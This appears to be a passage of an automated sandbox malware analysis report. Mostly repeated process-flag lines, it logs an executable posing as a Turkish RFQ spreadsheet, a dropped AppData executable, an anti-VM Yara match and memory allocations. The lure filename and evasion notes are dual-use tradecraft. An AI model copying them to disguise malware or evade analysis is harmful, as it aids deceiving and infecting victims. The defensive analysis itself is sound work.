                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: gNFUFfdz.exe PID: 7624, type: MEMORYSTR
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeMemory allocated: 1730000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeMemory allocated: 30F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeMemory allocated: 1730000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeMemory allocated: 9C70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeMemory allocated: 9830000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeMemory allocated: AC70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeMemory allocated: BC70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeMemory allocated: 3040000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeMemory allocated: 31C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeMemory allocated: 51C0000 memory reserve | memory write watchJump to behavior
